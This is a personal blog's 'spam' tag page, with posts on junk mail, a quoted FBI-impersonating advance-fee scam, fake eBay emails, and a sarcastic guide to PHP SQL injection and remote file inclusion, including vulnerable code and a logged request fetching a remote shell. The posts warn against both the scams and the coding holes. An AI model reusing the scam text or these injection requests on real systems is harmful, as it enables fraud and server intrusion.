Posts Tagged ‘spam’

20090926 Sky spam

I have pretty much reduced my physical communications (i.e. letters) to nothing. My bank doesn’t send me statements of operations that I am already aware of, because I check them online. My phone company doesn’t send me a physical invoice. Same for the internet provider.

Except there are still companies like Sky who keep sending me their “magazine”, which is in fact an advertising leaflet trying to convince me of the amazing benefits of their services and get me to sign up. The worst is that it isn’t even addressed to me; it is just sent to “the present occupier”.

And I normally just pick it up as it is pushed through our door by the postman, and drop it into the recycling bag without even opening it, because I don’t have the slightest interest in TV in general and Sky in particular (apart from the well-known fact that we don’t own a TV set). But today I thought: hey, maybe there is a way for me to tell them not to spam my mailbox with useless offers. So I opened it.

Oh how wrong I was. No, no and no. There is small print: on every footer on pretty much every page, but it is all dedicated to correcting what they offer with big bold capital letters on the remaining 85% of the pages. There’s no word about how to stop them sending you this abominable waste of resources.

I even went to their website, just in case, but again the same style: SIGN UP SIGN UP SIGN UP, and in very small letters, a myriad of restrictions.

So, how do I get them to stop sending me this rubbish, so that I don’t have to dispose of it every single time? Should we just send them an invoice accounting for all the time it takes us to get rid of the unsolicited physical letters they send to an unnamed addressee?

Advice is welcome!

(I haven’t looked into anything regarding the Data Protection Act because well… they are just sending letters to “whoever lives here”. It doesn’t quite fit with the idea of personal data being abused for commercial purposes.)

20090724 Nigerian scams go further

This time they have been really creative. What an amazing story to start the day!

The interesting technical detail is that it seems they are using the site of a certain Bonnie Langford (Wikipedia says she’s an actress and entertainer) to propel their spam into the UK, as I see by looking at the headers:

Received: from htt.cn (mail.htt.cn [61.152.94.80])
	by my.domain (Postfix) with SMTP id 56FAC4C032
	for <myemail@address>; Fri, 24 Jul 2009 02:06:45 +0000 (GMT)
Received: from User ([196.3.183.72])
	(envelope-sender <sales@htt.cn>)
	by 61.152.94.80 with ESMTP
	for <list@bonnielangford.co.uk>; Fri, 24 Jul 2009 09:49:01 +0800

my.domain and myemail@address are obviously substitutes for the real thing ;)

From: FBI (sales@htt.cn)
Reply-To: robertfbgent11@live.com
ROBERT MUELLER III
EXECUTIVE DIRECTOR FBI
FEDERAL BUREAU OF INVESTIGATION FBI.WASHINGTON DC.
FBI SEEKING TO WIRETAP INTERNET

ATTENTION:

We believe this notification meets you in a very good present state of mind and health. We the Federal bureau of investigation (FBI) Washington, DC in conjunction with some other relevant Investigation Agencies here in the United states of America have recently been informed through our Global intelligence monitoring network that you presently have a transaction going on with the Central Bank of Nigeria (CBN) And also With the Fedral Ministry of Finance as regards to your over-due contract payment which was fully endorsed in your favor accordingly.It might interest you to know that we have taken out time in screening through this project as stipulated on our protocol of operation and have finally confirmed that your contract payment is 100% genuine and hitch free from all facet and of which you have the lawful right to claim your fund without any further delay.Having said all this, we will further advise that you go ahead in dealing with FEDEX SHIPPING HEAD MANAGER OF INTERNATIONAL SHIPPING DEPARTMENT REV EM

In addendum, also be informed that we recently had a meeting with the Executive Governor of the Central Bank of Nigeria And the State Finance Department, in the person of Prof. Chukwuma Soludo and Mr. Aderemi Babalola on along with some of the top officials of the Ministry regarding your case and they made us to understand that your file has been held in abase depending on when you personally come for the claim. They also told us that the only problem they are facing right now is that some unscrupulous element are using this project as an avenue to scam innocent people off their hard earned money by impersonating the Executive Governor and the FEDEX SHIPPING COMPANY WHO ARE INCHARGE TO GET YOUR ATM CARD SHIPPED TO YOU.

We were also made to understand that a lady with name Mrs. Joan C. Bailey from OHIO Try to Cliam your fund Package from them and also told them you sent her to collect THE ATM CARD PACKAGE WHICH THE TOTAL IN IT IS $20 MILLION USD AND THIS INCLUDE INTEREST RATE UP TO DATE.

REV EMMANUEL JOHNSON did the wise thing by insisting on hearing from you personally before they go ahead on and sending the package which contain the ATM CARD AND ALL IT BACK UP DOCUMENT TO THE LADY so that was the main reason why they contacted us so as to assist them in making the investigations.

They further informed us that we should warn our dear citizens who must have been informed of the contract payment which was awarded to them from the Central Bank of Nigeria, to be very careful prior to this irregularities so that they don’t fall victim to this ugly circumstance. And should in case you are already dealing with anybody or office claiming to be from the Central Bankof Nigeria OR from Fedex Shipping company, you are further advised to STOP further contact with them in your best interest and then contact immediately the real office of the FEDEX SHIPPING COMAPNY IN CHARGE OF YOUR ATM CARD PACKAGE AND ALL IT BACK UP DOCUMENT SO IT CAN BE SHIPPED TO YOU ONCE THEY RECEIVE YOUR MESSAGE.

MY ADVICE TO YOU NOW IS TO CONTACT REV EMMANUEL JOHNSON VIA EMAIL HE IS THE MANAGER OF FEDEX INTERNATIONAL SHIPPING DEPARTMENT WITH THE INFORMATION BELOW AND HE WILL TELL YOU WHAT TO DO NEXT ON HOW TO GET YOUR ATM CARD PACKAGE SHIPPED TO YOUR RESIDENTIAL ADDRESS.

CONTACT REV EMMANUEL JOHNSON THROUGH EMAIL ( EMMAJOHNSIDE11@HOTMAIL.COM ) FOR MORE INFORMATION ON HOW TO GET YOUR ATM CARD PACKAGE WHICH CONTAIN $20 MILLION USD.

FEDEX BUILDING COMPANY
10 RIVERSIDE STREET.
LAGOS,NIGERIA
NAME: REV EMMANUEL JOHNSON
EMAIL: emmajohnside11@hotmail.com

NOTE:

In your best interest, any message that doesn’t come from the above official email address should not be replied to and should be disregarded accordingly for security reasons. Meanwhile, we will advise that you contact the FEDEX OFFICE AVOVE THROUGH EMAIL immediately with the above email address and request that they attend to your payment file as directed so as to enable you receive your contract fund accordingly.Ensure you follow all their procedure as may be required by them as that will further help hasten up the whole procedures as regards to the transfer of your fund to you as designated. Also have in mind that the FEDEX INTERNATIONAL SHIPPING DEPARTMENT equally have their own protocol of operation as stipulated on their banking terms, so delay could be very dangerous. Once again, we will advise that you contact them with the above email address and make sure you forward to them all the necessary informations which they may require from you prior to the release of your fund to you accordingly.

All modalities has already been worked out even before you were contacted and note that we will be monitoring all your dealings with them as you proceed so you don’t have anything to worry about. All we require from you henceforth is an update so as to enable us be on track with you and the FEDEX INTERNATIONAL SHIPPING DEPARTMENT. Without wasting much time, will want you to contact them immediately with the above email address so as to enable them attend to your case accordingly without any further delay as time is already running out.Should in case you need any more informations in regards to this notification,feel free to get back to us so that we can brief you more as we are here to guide you during and after this project has been completely perfected and you have received your contract fund as stated.Thank you very much for your anticipated co-operation in advance as we earnestly await your urgent response to this matter.

Best Regards remember Once you contact him keep me update,

Robert S. Mueller III
Federal Bureau of Investigation
J. Edgar Hoover Building
935 Pennsylvania Avenue,
NW Washington, D.C.
20535-0001, USA

I guess it should go without saying, but this is a scam. If you receive an e-mail like this one, do not reply to them in order to get access to an ATM card that contains 20 million dollars, because you [should already] know the money does not belong to you :P

Not that I don’t trust the usual visitors of my blog, but you never know who’s going to show up here coming from Google and friends….

20081219 The irony of spam

As soon as I posted yesterday’s analysis on eBay scams, I began to get a lot of pingbacks from quite suspicious-looking websites, with domains like ebayblog.info, ebay4you.info, etc… all of them using the .info TLD, which is one of the most commonly used by spammers as far as I have seen.

So it seems parked domains with lots of AdSense ads on the front page weren’t enough for them: now they have devised some kind of ultraspeedy spider which might be crawling recent posts on certain topics and then stealing the content to feed their domains. Just look at the post IDs they are handling: 19574, 23288… it’s humanly impossible to write that many articles in domains that young, even if you are so damn verbose! (On second thought: maybe Scobleizer could do that…)

I guess they are using Technorati or Google Blog Search to perform a periodic, automated search, although I have sometimes seen what looked like robots with strange user agents accessing my domain, and they might be the same kind of content thieves.

But you can’t do much when your stuff is online, other than hoping that people are clever enough to distinguish the good source from the bad one :D

20081218 eBay scams

Everything began with this scam, which I received several times. I kept copies just for the sake of observing what would follow. Since you know, once s(c|p)ammers get your e-mail address, the rubbish stream won’t stop flowing:

The missing ‘Sony Vaio PCG-VGX Brand New’

Hi again, i have no laptop from you by now if i don`t get an answer in 24 hours i will report you to eBay , PayPal and Police.

The user name was 361jaraldo, obviously totally automated. It surprised me at first since I had never received any fake eBay email like this before, but it was easy to spot it was false. Not only because I hadn’t sold any Sony Vaio that I don’t own, but also because real eBay emails include your name on them. This one didn’t.

What made me laugh was the menacing writing style: he would report to eBay, PayPal and Police!! Yeah, I’m truly frightened!!

Gold lock and key pendant necklace

This one deals with something that I would never ever own or try to buy, it just sounds so blingy-blingy that if it wasn’t because I’m sitting on a window inundated by the Mediterranean sun at its best, I would be already shivering.

findingaldo has opened an Unpaid Item case for GOLD EP LOCK AND KEY PENDANT NECKLACE 16-18 SNAKE CHAIN(#250319773021).

Please pay for the item or respond to the seller before Nov-29-2008. If you do not take any action, the seller can choose to give you an an Unpaid Item strike and your account may be suspended as a result.

Ohhh yes I’m sooooo scared! And look at the name: findingaldo. It reminds me of that Waldo Geraldo Falko who used to show up in Bel Air’s Prince series.

Plasma TV

This is the latest I got, and it is especially funny considering I don’t own a TV and the last thing I would do if I wanted to get rid of one would be selling it on eBay. The packaging and shipping costs to make sure it arrived without damage would be astronomical!

Please get me back to me as soon as you can with further information about the shipping of the plasma tv that i have bought from you. I am looking forward to get your reply. Thanks in advance !!

But… what for?

I wonder what the purpose of these e-mails is. I mean, the Nigerian-style scams make sense in a way, the Viagra, Levitra and tramadol spam e-mails also make sense in a way, but being urged to contact someone regarding an item that you don’t own and consequently can’t sell, or its shipping costs, doesn’t make any sense to me. Unless they want to harvest e-mail addresses of ingenuous people, in which case it does make total sense.

20071213 Get defacements, database dumps, remote shells, ownages and much more!

It works like this: you write dynamic code and allow parameters to be sent to your code. Then, without any type of filtering or validation, you use those raw values as parameters for your code.

I’ll give you two examples so that you can get the result almost instantly:

Example 1: open up your database

The script would be called as news.php?id=1, which would mean “give me the news whose id equals 1”

Then in news.php you have something like

$result = mysql_query("SELECT * FROM news WHERE id=".$_GET['id']);

This will make it easy even for level 1 script kiddies to practise their exploiter skills. Nothing too serious, you know, they may freely read and modify your data. Child’s play!

To make sure they get the maximum benefit of their stay in your server, don’t forget to store unencrypted passwords, so when they copy the users table, they can try to log into all the users’ accounts, since most people use the same password for every online service.

Example 2: open up your file system (and everything else)

You’ve been told about the advantages of using include files. You are not only using include() for including the header and footer, but you also load each section using something like index.php?section=name_of_the_section

Then in index.php you have this:

include($_GET['section']);

Usually it would be used with values of $_GET['section'] such as ‘clients.htm’, ‘about_us.htm’, ‘our_company.htm’… You name it! But what would you say if a script kiddie got creative and, instead of just entering a simple filename in your server, decided to add an http:// in front of it?

Like for example: index.php?section=http://astrangeserver/somewhere/including/usually/an/image.jpg

PHP will kindly load whatever is at that URL and evaluate the contents as PHP code.

What, evaluate an image? You’ll be surprised.

Try to open that image in your browser. Oh, image.jpg “can’t be displayed by the browser because it contains errors”. Really? Of course, because it’s not meant to be displayed, but to be executed. In fact it is a PHP file which contains code for converting your innocent index.php into a complete control panel from where a cracker can install more stuff in your server, or even try to deface other websites.

So PHP loads it, evaluates it and suddenly there’s a bunch of code ready to be executed at the cracker’s will.

Isn’t it brilliant, amazing, great?

… obviously not!

It’s like eating food from dodgy take-aways without thinking twice. You never know what you eat!

Personally, I’m bored to death of finding requests in the server logs such as index.php?id=http://www.antiqbook.co.uk/map/.xpl/lila.jpg?&cmd=cat%20bugado

And it just shows there are still people tacitly allowing undesirable behaviour to happen in their servers, without giving a damn about it or, even worse, without knowing about it. I wonder if the antiqbook administrators know about this directory with plenty of exploits, remote shells and what not in their server. Or maybe they are just a fake company.

So do us a favour: filter and validate your url parameters and stop contributing to illegal activities such as spam. Thank you very much.
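
What filtering and validating the two parameters from the examples above can look like, as an added sketch that is not part of the original post. The PDO handle, the news table layout, the sections/ directory and the function names fetch_news and resolve_section are assumptions made for illustration.

```php
<?php
// Added example. Assumed names (not from the post): a PDO handle, a "news"
// table with an integer id, and a sections/ directory beside this script.

// Example 1 hardened: validate the id, then bind it instead of concatenating.
function fetch_news(PDO $pdo, $rawId): ?array
{
    // Only a positive integer passes; strings such as "1 OR 1=1" give false.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    // Prepared statement: the value is sent separately from the SQL text.
    $stmt = $pdo->prepare('SELECT * FROM news WHERE id = :id');
    $stmt->execute([':id' => $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Example 2 hardened: the parameter only selects a key from a fixed allowlist.
function resolve_section($rawSection): string
{
    // Keys are what the URL may carry; values are the only files ever included.
    $sections = [
        'clients'     => 'clients.htm',
        'about_us'    => 'about_us.htm',
        'our_company' => 'our_company.htm',
    ];
    // URLs, path traversal strings and arrays are not keys, so they fall back.
    $key = (is_string($rawSection) && isset($sections[$rawSection])) ? $rawSection : 'about_us';
    return __DIR__ . '/sections/' . $sections[$key];
}

// Constructed demo data in an in-memory SQLite database (needs pdo_sqlite).
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)');
$pdo->exec("INSERT INTO news (title) VALUES ('First post')");

var_dump(fetch_news($pdo, '1'));         // a valid id
var_dump(fetch_news($pdo, '1 OR 1=1'));  // an injection attempt
echo resolve_section('our_company'), "\n";
echo resolve_section('http://astrangeserver/somewhere/image.jpg'), "\n";
```

In the real scripts the calls would be fetch_news($pdo, $_GET['id'] ?? null) and include resolve_section($_GET['section'] ?? null). Keeping allow_url_include set to Off in php.ini adds a second layer against the remote include in Example 2.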